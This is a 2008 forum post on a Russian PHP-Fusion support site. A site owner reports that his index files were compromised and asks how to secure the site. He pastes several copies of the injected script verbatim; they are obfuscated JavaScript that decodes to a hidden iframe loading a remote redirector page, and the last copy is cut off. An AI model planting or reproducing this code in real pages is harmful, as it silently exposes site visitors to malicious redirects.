ВНИМАНИЕ - PHP-Fusion SF Russian Support Site

Регистрация

Забыли пароль?

Правила форума

FAQ (читать перед созданием новой темы)

Просмотр темы

Вернуться на сайт: PHP-Fusion SF Russian Support Site

Форум поддержки PHP-Fusion SF | PHP-Fusion SF - Система Управлением Сайта | Ошибки / Bugs Reports

# 1

Тема: ВНИМАНИЕ

oldihome
Пользователь

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline

Опубликовано 11 Февраля 2008, 22:54:39

Случилась страшная ситуация, возможно из-за уязвимости в двиге или может по моей вине.
Сегодня я решил зайти к себе на сайт и меня начало переадресовывать на другие сайты, после чего нод32 начал материться и ругаться. Я сменил все пароли и посмотрел через фтп индексные фалы.
Они содержали странный код:
<SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!100!115!47!105!102!114!97!109!101!46!112!104!112!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!119!105!100!1
16!104!61!34!48!34!32!104!101!105!103!104!116!61!34!48!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.c
harAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);};
Decode();
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!100!115!47!105!102!114!97!109!101!46!112!104!112!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!119!105!100!1
16!104!61!34!48!34!32!104!101!105!103!104!116!61!34!48!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.c
harAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);};
Decode();
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!100!115!47!105!102!114!97!109!101!46!112!104!112!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!119!105!100!1
16!104!61!34!48!34!32!104!101!105!103!104!116!61!34!48!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.c
harAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);};
Decode();
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!100!115!47!105!102!114!97!109!101!46!112!104!112!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!119!105!100!1
16!104!61!34!48!34!32!104!101!105!103!104!116!61!34!48!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.c
harAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);};
Decode();
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!116!114!97!102!102!49!46!112!114!111!115!98!105!122!46!99!111!109!47!
116!1100!1

Я заменил их на старые и вроде всё заработало.
Расскажите мне ребята достаточно ли этих действий или надо там ещё что-нибудь поискать?
И как обезопасить себя в дальнейшем?
Спасибо за внимание.

[Изменил(а) oldihome, 11 Февраля 2008, 23:04:44]

--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU